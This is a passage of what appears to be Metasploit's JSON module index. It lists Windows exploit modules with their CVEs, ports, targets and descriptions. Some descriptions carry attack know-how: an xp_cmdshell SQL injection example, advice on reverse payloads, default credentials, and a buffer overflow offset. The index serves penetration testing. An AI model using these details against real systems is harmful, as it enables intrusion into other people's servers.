"description": "This module will execute an arbitrary payload on a Microsoft SQL\n Server, using a SQL injection vulnerability.\n\n Once a vulnerability is identified this module\n will use xp_cmdshell to upload and execute Metasploit payloads.\n It is necessary to specify the exact point where the SQL injection\n vulnerability happens. For example, given the following injection:\n\n http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical\n\n you would need to set the following path:\n set GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar\n\n In regard to the payload, unless there is a closed port in the web server,\n you dont want to use any \"bind\" payload, specially on port 80, as you will\n stop reaching the vulnerable web server host. You want a \"reverse\" payload, probably to\n your port 80 or to any other outbound port allowed on the firewall.\n For privileged ports execute Metasploit msfconsole as root.\n\n Currently, three delivery methods are supported.\n\n First, the original method uses Windows 'debug.com'. File size restrictions are\n avoided by incorporating the debug bypass method presented by SecureStat at\n Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.\n\n A second method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n payload on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.",
"references": [
"CVE-2000-0402",
"OSVDB-557",
"BID-1281",
"CVE-2000-1209",
"OSVDB-15757",
"BID-4797",
"URL-http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/mssql/mssql_payload_sqli.rb",
"is_install_path": true,
"ref_name": "windows/mssql/mssql_payload_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mysql/mysql_mof": {
"name": "Oracle MySQL for Microsoft Windows MOF Execution",
"full_name": "exploit/windows/mysql/mysql_mof",
"rank": 600,
"disclosure_date": "2012-12-01",
"type": "exploit",
"author": [
"kingcope",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module takes advantage of a file privilege misconfiguration problem\n specifically against Windows MySQL servers (due to the use of a .mof file).\n This may result in arbitrary code execution under the context of SYSTEM.\n This module requires a valid MySQL account on the target machine.",
"references": [
"CVE-2012-5613",
"OSVDB-88118",
"EDB-23083",
"URL-https://seclists.org/fulldisclosure/2012/Dec/13"
],
"platform": "Windows",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MySQL on Windows prior to Vista"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/mysql/mysql_mof.rb",
"is_install_path": true,
"ref_name": "windows/mysql/mysql_mof",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mysql/mysql_start_up": {
"name": "Oracle MySQL for Microsoft Windows FILE Privilege Abuse",
"full_name": "exploit/windows/mysql/mysql_start_up",
"rank": 600,
"disclosure_date": "2012-12-01",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>",
"Sean Verity <veritysr1980@gmail.com>"
],
"description": "This module takes advantage of a file privilege misconfiguration problem\n specifically against Windows MySQL servers. This module abuses the FILE\n privilege to write a payload to Microsoft's All Users Start Up directory\n which will execute every time a user logs in. The default All Users Start\n Up directory used by the module is present on Windows 7.",
"references": [
"CVE-2012-5613",
"OSVDB-88118",
"EDB-23083",
"URL-https://seclists.org/fulldisclosure/2012/Dec/13"
],
"platform": "Windows",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MySQL on Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/mysql/mysql_start_up.rb",
"is_install_path": true,
"ref_name": "windows/mysql/mysql_start_up",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mysql/mysql_yassl_hello": {
"name": "MySQL yaSSL SSL Hello Message Buffer Overflow",
"full_name": "exploit/windows/mysql/mysql_yassl_hello",
"rank": 200,
"disclosure_date": "2008-01-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier)\n implementation bundled with MySQL <= 6.0. By sending a specially crafted\n Hello packet, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-0226",
"OSVDB-41195",
"BID-27140"
],
"platform": "Windows",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MySQL 5.0.45-community-nt",
"MySQL 5.1.22-rc-community"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/mysql/mysql_yassl_hello.rb",
"is_install_path": true,
"ref_name": "windows/mysql/mysql_yassl_hello",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mysql/scrutinizer_upload_exec": {
"name": "Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential",
"full_name": "exploit/windows/mysql/scrutinizer_upload_exec",
"rank": 600,
"disclosure_date": "2012-07-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Jonathan Claudius",
"Tanya Secker",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer.\n By default, the software installs a default password in MySQL, and binds the\n service to \"0.0.0.0\". This allows any remote user to login to MySQL, and then\n gain arbitrary remote code execution under the context of 'SYSTEM'. Examples\n of default credentials include: 'scrutinizer:admin', and 'scrutremote:admin'.",
"references": [
"CVE-2012-3951",
"OSVDB-84317",
"URL-http://secunia.com/advisories/50074/",
"URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Scrutinizer NetFlow and sFlow Analyzer 9.5.2 or older"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb",
"is_install_path": true,
"ref_name": "windows/mysql/scrutinizer_upload_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/nfs/xlink_nfsd": {
"name": "Omni-NFS Server Buffer Overflow",
"full_name": "exploit/windows/nfs/xlink_nfsd",
"rank": 200,
"disclosure_date": "2006-11-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Xlink Omni-NFS Server 5.2\n When sending a specially crafted nfs packet, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2006-5780",
"OSVDB-30224",
"BID-20941",
"URL-http://www.securityfocus.com/data/vulnerabilities/exploits/omni-nfs-server-5.2-stackoverflow.pm"
],
"platform": "Windows",
"arch": "",
"rport": 2049,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/nfs/xlink_nfsd.rb",
"is_install_path": true,
"ref_name": "windows/nfs/xlink_nfsd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/nntp/ms05_030_nntp": {
"name": "MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow",
"full_name": "exploit/windows/nntp/ms05_030_nntp",
"rank": 300,
"disclosure_date": "2005-06-14",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the news reader of Microsoft\n Outlook Express.",
"references": [
"CVE-2005-1213",
"OSVDB-17306",
"BID-13951",
"MSB-MS05-030"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 English SP0-SP4",
"Windows XP English SP0/SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/nntp/ms05_030_nntp.rb",
"is_install_path": true,
"ref_name": "windows/nntp/ms05_030_nntp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/file_reporter_fsfui_upload": {
"name": "NFR Agent FSFUI Record File Upload RCE",
"full_name": "exploit/windows/novell/file_reporter_fsfui_upload",
"rank": 500,
"disclosure_date": "2012-11-16",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload\n arbitrary files via a directory traversal while handling requests to /FSF/CMD with\n FSFUI records with UICMD 130. This module has been tested successfully against NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).",
"references": [
"CVE-2012-4959",
"OSVDB-87573",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
],
"platform": "Windows",
"arch": "",
"rport": 3037,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb",
"is_install_path": true,
"ref_name": "windows/novell/file_reporter_fsfui_upload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/groupwisemessenger_client": {
"name": "Novell GroupWise Messenger Client Buffer Overflow",
"full_name": "exploit/windows/novell/groupwisemessenger_client",
"rank": 300,
"disclosure_date": "2008-07-02",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell's GroupWise Messenger Client.\n By sending a specially crafted HTTP response, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2008-2703",
"OSVDB-46041",
"BID-29602",
"URL-http://www.infobyte.com.ar/adv/ISR-17.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Novell GroupWise Messenger 2.0 Client",
"Novell GroupWise Messenger 1.0 Client"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/novell/groupwisemessenger_client.rb",
"is_install_path": true,
"ref_name": "windows/novell/groupwisemessenger_client",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/netiq_pum_eval": {
"name": "NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution",
"full_name": "exploit/windows/novell/netiq_pum_eval",
"rank": 600,
"disclosure_date": "2012-11-15",
"type": "exploit",
"author": [
"rgod",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a lack of authorization in the NetIQ Privileged User Manager\n service (unifid.exe) to execute arbitrary perl code. The problem exists in the\n ldapagnt module. The module has been tested successfully on NetIQ PUM 2.3.1 over\n Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.",
"references": [
"CVE-2012-5932",
"OSVDB-87334",
"BID-56539",
"EDB-22738"
],
"platform": "Windows",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/novell/netiq_pum_eval.rb",
"is_install_path": true,
"ref_name": "windows/novell/netiq_pum_eval",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/nmap_stor": {
"name": "Novell NetMail NMAP STOR Buffer Overflow",
"full_name": "exploit/windows/novell/nmap_stor",
"rank": 200,
"disclosure_date": "2006-12-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.",
"references": [
"CVE-2006-6424",
"OSVDB-31363",
"BID-21725"
],
"platform": "Windows",
"arch": "",
"rport": 689,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/novell/nmap_stor.rb",
"is_install_path": true,
"ref_name": "windows/novell/nmap_stor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/zenworks_desktop_agent": {
"name": "Novell ZENworks 6.5 Desktop/Server Management Overflow",
"full_name": "exploit/windows/novell/zenworks_desktop_agent",
"rank": 400,
"disclosure_date": "2005-05-19",
"type": "exploit",
"author": [
"Unknown"
],
"description": "This module exploits a heap overflow in the Novell ZENworks\n Desktop Management agent. This vulnerability was discovered\n by Alex Wheeler.",
"references": [
"CVE-2005-1543",
"OSVDB-16698",
"BID-13678"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/novell/zenworks_desktop_agent.rb",
"is_install_path": true,
"ref_name": "windows/novell/zenworks_desktop_agent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/zenworks_preboot_op21_bof": {
"name": "Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow",
"full_name": "exploit/windows/novell/zenworks_preboot_op21_bof",
"rank": 300,
"disclosure_date": "2010-03-30",
"type": "exploit",
"author": [
"Stephen Fewer",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management 10 SP2. The vulnerability exists in the Preboot service and can be\n triggered by sending a specially crafted packet with the opcode 0x21\n (PROXY_CMD_FTP_FILE) to port 998/TCP. The module has been successfully tested on\n Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2\n (DEP bypass).",
"references": [
"CVE-2012-2215",
"OSVDB-65361",
"BID-40486",
"ZDI-10-090",
"URL-http://www.novell.com/support/kb/doc.php?id=7005572"
],
"platform": "Windows",
"arch": "",
"rport": 998,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb",
"is_install_path": true,
"ref_name": "windows/novell/zenworks_preboot_op21_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/zenworks_preboot_op4c_bof": {
"name": "Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow",
"full_name": "exploit/windows/novell/zenworks_preboot_op4c_bof",
"rank": 300,
"disclosure_date": "2012-02-22",
"type": "exploit",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management. The vulnerability exists in the Preboot service and can be triggered\n by sending a specially crafted packet with the opcode 0x4c\n (PROXY_CMD_PREBOOT_TASK_INFO2) to port 998/TCP. The module has been successfully\n tested on Novell ZENworks Configuration Management 10 SP2 / SP3 and Windows Server\n 2003 SP2 (DEP bypass).",
"references": [
"CVE-2011-3176",
"OSVDB-80231",
"BID-52659",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=974"
],
"platform": "Windows",
"arch": "",
"rport": 998,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2",
"Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb",
"is_install_path": true,
"ref_name": "windows/novell/zenworks_preboot_op4c_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/zenworks_preboot_op6_bof": {
"name": "Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow",
"full_name": "exploit/windows/novell/zenworks_preboot_op6_bof",
"rank": 300,
"disclosure_date": "2010-03-30",
"type": "exploit",
"author": [
"Stephen Fewer",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management 10 SP2. The vulnerability exists in the Preboot service and can be\n triggered by sending a specially crafted packet with the opcode 0x06\n (PROXY_CMD_CLEAR_WS) to the 998/TCP port. The module has been successfully tested\n on Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2\n (DEP bypass).",
"references": [
"OSVDB-65361",
"BID-40486",
"ZDI-10-090",
"URL-http://www.novell.com/support/kb/doc.php?id=7005572"
],
"platform": "Windows",
"arch": "",
"rport": 998,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb",
"is_install_path": true,
"ref_name": "windows/novell/zenworks_preboot_op6_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/novell/zenworks_preboot_op6c_bof": {
"name": "Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow",
"full_name": "exploit/windows/novell/zenworks_preboot_op6c_bof",
"rank": 300,
"disclosure_date": "2012-02-22",
"type": "exploit",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management. The vulnerability exists in the Preboot service and can be triggered by\n sending a specially crafted packet with the opcode 0x6c (PROXY_CMD_GET_NEXT_STEP)\n to port 998/TCP. The module has been successfully tested on Novell ZENworks\n Configuration Management 10 SP2 / SP3 and Windows Server 2003 SP2 (DEP bypass).",
"references": [
"CVE-2011-3175",
"OSVDB-80231",
"BID-52659",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=973"
],
"platform": "Windows",
"arch": "",
"rport": 998,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2",
"Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb",
"is_install_path": true,
"ref_name": "windows/novell/zenworks_preboot_op6c_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/nuuo/nuuo_cms_fu": {
"name": "Nuuo Central Management Server Authenticated Arbitrary File Upload",
"full_name": "exploit/windows/nuuo/nuuo_cms_fu",
"rank": 0,
"disclosure_date": "2018-10-11",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the\n CMS Server.\n The vulnerability is in the \"FileName\" parameter, which accepts directory traversal (..\\..\\)\n characters. Therefore, this function can be abused to overwrite any files in the installation\n drive of CMS Server.\n\n This vulnerability is exploitable in CMS versions up to and including v2.4.\n\n This module will either use a provided session number (which can be guessed with an auxiliary\n module) or attempt to login using a provided username and password - it will also try the\n default credentials if nothing is provided.\n\n This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module\n fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will\n not execute successfully.",
"references": [
"CVE-2018-17936",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02",
"URL-https://seclists.org/fulldisclosure/2019/Jan/51",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 5180,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Nuuo Central Management Server <= v2.4.0"
],
"mod_time": "2019-04-23 06:28:57 +0000",
"path": "/modules/exploits/windows/nuuo/nuuo_cms_fu.rb",
"is_install_path": true,
"ref_name": "windows/nuuo/nuuo_cms_fu",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/nuuo/nuuo_cms_sqli": {
"name": "Nuuo Central Management Authenticated SQL Server SQLi",
"full_name": "exploit/windows/nuuo/nuuo_cms_sqli",
"rank": 300,
"disclosure_date": "2018-10-11",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.\n This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is\n installed by default, xp_cmdshell can be enabled and abused to achieve code execution.\n This module will either use a provided session number (which can be guessed with an auxiliary\n module) or attempt to login using a provided username and password - it will also try the\n default credentials if nothing is provided.",
"references": [
"CVE-2018-18982",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02",
"URL-https://seclists.org/fulldisclosure/2019/Jan/51",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 5180,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Nuuo Central Management Server <= v2.10.0"
],
"mod_time": "2019-04-23 06:29:51 +0000",
"path": "/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb",
"is_install_path": true,
"ref_name": "windows/nuuo/nuuo_cms_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"SideEffects": [
"artifacts-on-disk"
]
}
},
"exploit_windows/oracle/client_system_analyzer_upload": {
"name": "Oracle Database Client System Analyzer Arbitrary File Upload",
"full_name": "exploit/windows/oracle/client_system_analyzer_upload",
"rank": 600,
"disclosure_date": "2011-01-18",
"type": "exploit",
"author": [
"1c239c43f521145fa8385d64a9c32243",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability on the Client\n Analyzer component as included in Oracle Database 11g, which allows remote\n attackers to upload and execute arbitrary code. This module has been tested\n successfully on Oracle Database 11g 11.2.0.1.0 on Windows 2003 SP2, where execution\n through the Windows Management Instrumentation service has been used.",
"references": [
"CVE-2010-3600",
"OSVDB-70546",
"BID-45883",
"ZDI-11-018",
"URL-http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html"
],
"platform": "Windows",
"arch": "",
"rport": 1158,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Oracle Oracle11g 11.2.0.1.0 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/oracle/client_system_analyzer_upload.rb",
"is_install_path": true,
"ref_name": "windows/oracle/client_system_analyzer_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/oracle/extjob": {
"name": "Oracle Job Scheduler Named Pipe Command Execution",
"full_name": "exploit/windows/oracle/extjob",
"rank": 600,
"disclosure_date": "2007-01-01",
"type": "exploit",
"author": [
"David Litchfield",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job\n Scheduler is implemented via the component extjob.exe which listens on a named pipe\n called \"orcljsex<SID>\" and execute arbitrary commands received over this channel via\n CreateProcess(). In order to connect to the Named Pipe remotely, SMB access is required.\n Note that the Job Scheduler is disabled in default installations.",
"references": [
"URL-http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/oracle/extjob.rb",
"is_install_path": true,
"ref_name": "windows/oracle/extjob",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/oracle/osb_ndmp_auth": {
"name": "Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow",
"full_name": "exploit/windows/oracle/osb_ndmp_auth",
"rank": 400,
"disclosure_date": "2009-01-14",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "The module exploits a stack buffer overflow in Oracle Secure Backup.\n When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-5444",
"OSVDB-51340",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html"
],
"platform": "Windows",
"arch": "",
"rport": 10000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Oracle Secure Backup 10.1.0.3 (Windows 2003 SP0/Windows XP SP3)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/oracle/osb_ndmp_auth.rb",
"is_install_path": true,
"ref_name": "windows/oracle/osb_ndmp_auth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/oracle/tns_arguments": {
"name": "Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow",
"full_name": "exploit/windows/oracle/tns_arguments",
"rank": 400,
"disclosure_date": "2001-06-28",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Oracle 8i. When\n sending a specially crafted packet containing an overly long\n ARGUMENTS string to the TNS service, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2001-0499",
"OSVDB-9427",
"BID-2941"
],
"platform": "Windows",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Oracle 8.1.7.0.0 Standard Edition (Windows 2000)",
"Oracle 8.1.7.0.0 Standard Edition (Windows 2003)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/oracle/tns_arguments.rb",
"is_install_path": true,
"ref_name": "windows/oracle/tns_arguments",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/oracle/tns_auth_sesskey": {
"name": "Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow",
"full_name": "exploit/windows/oracle/tns_auth_sesskey",
"rank": 500,
"disclosure_date": "2009-10-20",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Oracle. When\n sending a specially crafted packet containing a long AUTH_SESSKEY value\n to the TNS service, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-1979",
"OSVDB-59110",
"BID-36747",
"URL-http://blogs.conus.info/node/28",
"URL-http://blogs.conus.info/node/35",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html"
],
"platform": "Windows",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Oracle 10.2.0.1.0 Enterprise Edition",
"Oracle 10.2.0.4.0 Enterprise Edition"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/oracle/tns_auth_sesskey.rb",
"is_install_path": true,
"ref_name": "windows/oracle/tns_auth_sesskey",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/oracle/tns_service_name": {
"name": "Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow",
"full_name": "exploit/windows/oracle/tns_service_name",
"rank": 400,
"disclosure_date": "2002-05-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Oracle. When\n sending a specially crafted packet containing a long SERVICE_NAME\n to the TNS service, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2002-0965",
"OSVDB-5041",
"BID-4845",
"URL-http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Oracle 8.1.7.0.0 Standard Edition (Windows 2000)",
"Oracle 8.1.7.0.0 Standard Edition (Windows 2003)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/oracle/tns_service_name.rb",
"is_install_path": true,
"ref_name": "windows/oracle/tns_service_name",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/pop3/seattlelab_pass": {
"name": "Seattle Lab Mail 5.5 POP3 Buffer Overflow",
"full_name": "exploit/windows/pop3/seattlelab_pass",
"rank": 500,
"disclosure_date": "2003-05-07",
"type": "exploit",
"author": [
"stinko <vinnie@metasploit.com>"
],
"description": "There exists an unauthenticated buffer overflow vulnerability\n in the POP3 server of Seattle Lab Mail 5.5 when sending a password\n with excessive length.\n\n Successful exploitation should not crash either the\n service or the server; however, after initial use the\n port cannot be reused for successive exploitation until\n the service has been restarted. Consider using a command\n execution payload following the bind shell to restart\n the service if you need to reuse the same port.\n\n The overflow appears to occur in the debugging/error reporting\n section of the slmail.exe executable, and there are multiple\n offsets that will lead to successful exploitation. This exploit\n uses 2606, the offset that creates the smallest overall payload.\n The other offset is 4654.\n\n The return address is overwritten with a \"jmp esp\" call from the\n application library SLMFC.DLL found in %SYSTEM%\\system32\\. This\n return address works against all version of Windows and service packs.\n\n The last modification date on the library 